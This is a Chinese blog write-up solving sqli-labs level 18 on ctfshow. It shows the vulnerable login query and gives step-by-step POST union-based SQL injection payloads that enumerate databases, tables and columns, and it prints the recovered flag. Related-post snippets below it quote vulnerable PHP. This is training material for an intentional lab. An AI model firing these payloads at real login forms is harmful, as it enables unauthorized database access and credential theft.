sql i-labs第十八关

最新推荐文章于 2024-08-02 21:17:27 发布
最新推荐文章于 2024-08-02 21:17:27 发布
阅读量581 收藏 7
点赞数 7
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81935750/article/details/140128356
版权

这下变成POST注入了,还是双参数。

72e54f433e3fe54d73703830fa5ee023.png

抓个包看看先:

7623efa1b7304e25c139954521715d86.png

注入点应该是admin。

查看一下本地环境中,这题的源码。

6bd042cd5173570d5fdd7bb7c652b90e.png

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
  •  

闭合是单引号'。位数是2.

爆库: ctfshow

uname=xxx' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata--+&passwd=123456&submit=Submit
  •  

f7f3af9ff8df8f628cfbe9e63bd14081.png

爆表: flagugsd

uname=xxx' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+&passwd=123456&submit=Submit
  •  

c8a54d23ea3c28efd84336f4fb246f11.png

爆列: flag43s

uname=xxx' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'--+&passwd=123456&submit=Submit
  •  

0a18536c6597a4f0316dd772ea5e8928.png

获取字段值(flag):

ctfshow{d7bf0480-8156-479b-9f97-4fbeb89233db}

uname=xxx' and 1=2 union select 1,group_concat(flag43s) from ctfshow.flagugsd--+&passwd=123456&submit=Submit
  • 60d43b4f46b04acfb4a78d083c2cabfd.png

 

 

2301_81935750
关注
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1282
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs 1-10通教程
m0_51428325的博客
12-26 714
1.LOW <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query
SQLI-labs-第十八
weixin_54055099的博客
05-17 639
Sqli-labs18,http头部注入,报错注入
sqli-labs(less-18)
最新发布
m0_64849639的博客
08-02 815
less-18于uagent注入
sqli-labs(18)
2302_78903258的博客
05-25 356
这里最重要的是第5点,简单来说我们可以在user-agent里进行注入,但注入的参数要符合sql 语句的要求,所以我们在user-name里注入的参数有3个,并且要对uagent参数进行闭合。: 这是一个SQL查询语句,目的是从名为'users'的表格中选择用户名和密码与用户输入匹配的行。首先,随便输入账号密码,然后进行抓包,当页面显示uagent的时候,我们可以想到uagent注入。: 这是一个SQL插入语句,将用户代理、IP地址和用户名插入到名为'uagents'的表格中。
sqli-labs第十八
yuqnqi的博客
05-10 423
通过注入点测试填写正确的账户密码可以获得浏览器标识符,所以应该是通过浏览器标识符进行注入,为确认一下猜测是否正确,查看一下源码。注入点在 uagent处,确定注入点后,输入SQL语句。可以参考前面的单引号注入,比如第十一,我就先溜了。页面提示user agent。接下来就正常的注入了。
sqli-labs--------第18
wyzhxhn的博客
11-10 1282
sql插入语句 User-Agent
sqli-labs基础篇 第18~22
Lucky小小吴的小屋
01-23 2437
sqli-labs基础篇 第18~22,主要学习内容:burp抓包、数据包修改
sqllabs通
m0_64674174的博客
10-24 656
主界面由于mysql_real_escape_string的过滤,将单引号,双引号等进行转义,无法进行注入,注册界面以及修改密码界面,由于注册界面以及修改密码见面的闭合方式不一样,可以达到二次注入的目的,创建。安装方法:解压到小皮面板的www的目录下,在sqllabs的sql-connections目录下的db-creds.inc文件,下图划横线位置设置自己的密码即可,从代码角度而言,可以很清楚的看出由单引号闭合,直接使用sql注入的一半流程即可,查询字段,判断回显,数据库——表——列,即可 为。
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1725
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
CTFshow-sqli-labs
Leo8283的博客
04-20 740
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
《从0到1000》sqli-labs1-75解题记录
BaiScorpio的博客
05-17 1247
1
sqli-labs18(基于http头部报错盲注)通思路
zyh1588的博客
11-18 2070
小白回顾sql靶场第18
SQLI-LABS靶场18:Truncated incorrect DOUBLE value错误
sinat_39522506的博客
07-17 280
注入时,PAYLOAD正确,但是出现Truncated incorrect DOUBLE value:Mozilla/5.0 (Windows NT 10.0;sql版本换到5.5.29版本(5.5.x应该都可以)如果显示数据库连接失败,重启一下靶场。
Sqlilabs-18
KAKA的博客
07-09 901
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli-labs第十八~第二十二
yuqnqi的博客
05-13 956
这几均为请求头注入,请求头记录的信息可以拼接到SQL语句上,User-Agent ,浏览器身份标识字符串Referer,表示浏览器访问的前一个页面,可以认为是之前访问页面的连接件浏览器带到了当前页面Accept ,可接受的响应内容类型(Content-Type)X-Forwarded-For, 可以用来表示http请求真实IPDate,发送该消息的日期和时间第十八暴库名爆表名爆字段名爆数据。
sqli.labs靶场(第18~22
喜欢创作各种技术类文章,希望可以帮到你
01-28 1991
sqli.labs靶场第18到22详情
sqli-labs第1118
gclome的博客
11-09 1203
Less-11 (基于错误的POST型单引号字符型注入) 打开这个页面,是这样的 在username和password都输入admin,登陆成功,而且上面的post data也已经自动载入输入的表单数据。 当然这一步还可以用burp suite进行抓包,send to repeater 通过修改post的值就可以进行注入 输入uname=admin' and 1=1%23 &passwd...
upload-labs 第十八
08-23
upload-labs 第十八是一个文件上传的挑战。 在这个挑战中,你需要通过绕过一系列的安全措施来成功上传恶意文件。首先,上传的文件需要是一个图片文件,而不能是其他类型的文件。其次,你还需要绕过服务器对文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值